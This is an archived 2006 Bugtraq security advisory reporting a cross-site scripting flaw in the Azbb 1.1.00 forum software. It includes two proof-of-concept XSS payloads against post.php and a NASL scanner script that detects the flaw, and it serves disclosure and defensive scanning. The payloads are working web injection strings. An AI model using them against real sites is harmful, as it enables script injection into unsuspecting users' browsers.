Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Azbb v1.1.00 Cross-Site Scripting

from [roozbeh_afrasiabi] Network Security [Permanent Link]
Subject: Azbb v1.1.00 Cross-Site Scripting
Date: 23 Jan 2006 01:43:40 -0000 
[KAPDA::#22] - Azbb v1.1.00 Cross Site Scripting

KAPDA New advisory

Vulnerable products : Azbb <= 1.1.00
Vendor:  www.azbb.org
Risk: Low
Vulnerabilities: Cross Site Scripting

Date :
--------------------
Found : Jan 20 2006
Vendor Contacted : Jan 21 2006
Release Date : Jan 21 2006

About :
--------------------
AZbb is "a forum that was written with a primary focus on security.
AZbb does not require a database such as MySQL, PostgreSQL or MSSQL and can 
even be used as a blog, or a portal".


Vulnerability:
--------------------
Cross_Site_Scripting (XSS,CSS):

AZ Bulletin Board is affected by a cross-site scripting vulnerability.
This issue is due to the failure of the application to properly sanitize 
user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker to 
create a malicious link containing script code that will be executed in the 
browser of an unsuspecting user when followed.


PoC :
--------------------

1)

This flaw exists because the application does not validate the "name" variable 
upon submission to the post.php script via the POST method.

h**p://www.[target]/post.php   name="><script>alert('XSS')</script><!--



2)[limited XSS]

h**p://www.[target]/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"


NASL :
--------------------
azbb_1100_XSS.nasl
#
#  This script was written by Pedram Hayati <pi3ch at kapda dot ir>
#  (C) KAPDA Computer Security Science Researchers Institute
#   http://www.kapda.ir
#
#  This script is released under the GNU GPL v2

if(description)
{
script_version ("$Revision: 1.0 $");
name["english"] = "Azbb XSS";

script_name(english:name["english"]);

desc["english"] = "
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low";

script_description(english:desc["english"]);

summary["english"] = "Checks post.php XSS";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);


script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");

family["english"] = "CGI abuses : XSS";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if (!get_port_state(port))exit(0);

if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);

foreach dir (cgi_dirs())
{
req = string(dir, 
"/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"javascript:alert()", string:r))
{
     security_warning(port);
     exit(0);
}
}
exit(0);

Solution :
--------------------
N/A

Original Advisory :
--------------------
http://kapda.ir/advisory-236.html

Credit :
--------------------
Discoverd by Roozbeh Afrasiabi
roozbeh_afrasiabi {a] yahoo.com
black_death {a] kapda.ir
www.persiax.com [currently down]

NASL Script by pi3ch {a] kapda.ir
KAPDA - Institute for Computer Security Researchers
http://www.KAPDA.ir
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Azbb v1.1.00 Cross-Site Scripting, roozbeh_afrasiabi <=
Previous by Date:  [Full-disclosure] Re: What A Click! [Internet Explorer], Robert Kim Wireless Internet Advisor
Next by Date:  [Full-disclosure] Multiple vulnerabilities in CommuniGate Pro Server, Evgeny Legerov
Previous by Thread:  [ MDKSA-2006:024 ] - Updated ImageMagick packages fix vulnerabilities, security
Next by Thread:  [Full-disclosure] Multiple vulnerabilities in CommuniGate Pro Server, Evgeny Legerov
Indexes:  [Date] [Thread] [Top] [All Lists]